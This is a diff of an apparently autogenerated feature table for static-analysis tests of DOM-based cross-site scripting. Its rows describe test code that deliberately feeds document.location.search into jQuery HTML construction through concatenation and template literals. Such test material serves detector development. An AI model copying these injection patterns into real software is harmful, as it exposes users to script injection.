autogenerated/Xss/DomBasedXss/typeahead.js:24:9:26:9 | suggest ... } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:26:9 | suggest ... } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:26:9 | suggest ... } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:24:20 | this | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:24:20 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:24:20 | this | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:24:20 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:24:20 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | 'arguments' object of method suggestion | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | 'arguments' object of method suggestion | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | 'arguments' object of method suggestion | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | 'arguments' object of method suggestion | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | 'arguments' object of method suggestion | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | exceptional return of method suggestion | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | exceptional return of method suggestion | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | exceptional return of method suggestion | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | exceptional return of method suggestion | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | exceptional return of method suggestion | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | functio ... } | CalleeFlexibleAccessPath | $().typeahead | | autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | functio ... } | InputAccessPathFromCallee | 1.templates.suggestion | | autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | functio ... } | InputArgumentIndex | 1 | @@ -18203,12 +125037,121 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | functio ... } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | functio ... } | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | functio ... } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | return of method suggestion | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | return of method suggestion | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | return of method suggestion | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | return of method suggestion | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:21:26:9 | return of method suggestion | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:30:24:32 | val | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:30:24:32 | val | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:30:24:32 | val | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:30:24:32 | val | contextSurroundingFunctionParameters | ()\n(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:30:24:32 | val | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:30:24:32 | val | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:30:24:32 | val | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:30:24:32 | val | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:30:24:32 | val | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:30:24:32 | val | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:25:18:25:20 | val | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:25:18:25:20 | val | contextSurroundingFunctionParameters | ()\n(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:25:18:25:20 | val | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:25:18:25:20 | val | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:25:18:25:20 | val | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:1:0 | this | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:1:0 | this | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:1:0 | this | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:1:0 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | 'arguments' object of function test | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | 'arguments' object of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | 'arguments' object of function test | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | 'arguments' object of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | 'arguments' object of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | exceptional return of function test | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | exceptional return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | exceptional return of function test | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | exceptional return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | exceptional return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | functio ... OT OK\\n} | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | functio ... OT OK\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | return of function test | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | return of function test | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:1:22:1 | return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:10:1:13 | test | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:10:1:13 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:1:10:1:13 | test | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:12 | tainted | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:12 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:12 | tainted | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:12 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:12 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:39 | tainted | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:39 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:39 | tainted | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:39 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:39 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:39 | tainted ... .search | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:39 | tainted ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:39 | tainted ... .search | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:39 | tainted ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:6:2:39 | tainted ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:23 | document | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:23 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:23 | document | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:23 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:23 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:32 | document.location | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:32 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:32 | document.location | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:32 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:32 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:39 | documen ... .search | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:39 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:39 | documen ... .search | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:39 | documen ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:16:2:39 | documen ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:25:2:32 | location | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:25:2:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:25:2:32 | location | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:25:2:32 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:25:2:32 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:34:2:39 | search | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:34:2:39 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:34:2:39 | search | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:34:2:39 | search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:2:34:2:39 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:2 | $ | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:2 | $ | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:2 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:2 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:32 | $("
    ") | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:32 | $("
    ") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:32 | $("
    ") | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:32 | $("
    ") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:32 | $("
    ") | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:32 | exceptional return of $("
    ") | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:32 | exceptional return of $("
    ") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:32 | exceptional return of $("
    ") | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:32 | exceptional return of $("
    ") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:2:4:32 | exceptional return of $("
    ") | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:10 | "
    " | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:10 | "
    " | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:10 | "
    " | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:10 | "
    " | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:10 | "
    " | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:10 | "
    " | stringConcatenatedWith | -endpoint- tainted + '
    ' | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:20 | "
    " + tainted | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:20 | "
    " + tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:20 | "
    " + tainted | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:20 | "
    " + tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:20 | "
    " + tainted | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18228,6 +125171,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:24:4:31 | "
    " | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:24:4:31 | "
    " | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:4:24:4:31 | "
    " | stringConcatenatedWith | '
    ' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:2 | $ | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:2 | $ | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:2 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:2 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:27 | $(`
    `) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:27 | $(`
    `) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:27 | $(`
    `) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:27 | $(`
    `) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:27 | $(`
    `) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:27 | exceptional return of $(`
    `) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:27 | exceptional return of $(`
    `) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:27 | exceptional return of $(`
    `) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:27 | exceptional return of $(`
    `) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:2:5:27 | exceptional return of $(`
    `) | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18253,12 +125211,47 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:20:5:25 |
    | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:20:5:25 |
    | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:5:20:5:25 |
    | stringConcatenatedWith | '
    ' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:2 | $ | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:2 | $ | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:2 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:2 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:44 | $("
    ")) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:44 | $("
    ")) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:44 | $("
    ")) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:44 | $("
    ")) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:44 | $("
    ")) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:44 | exceptional return of $("
    ")) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:44 | exceptional return of $("
    ")) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:44 | exceptional return of $("
    ")) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:44 | exceptional return of $("
    ")) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:2:6:44 | exceptional return of $("
    ")) | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:10 | "
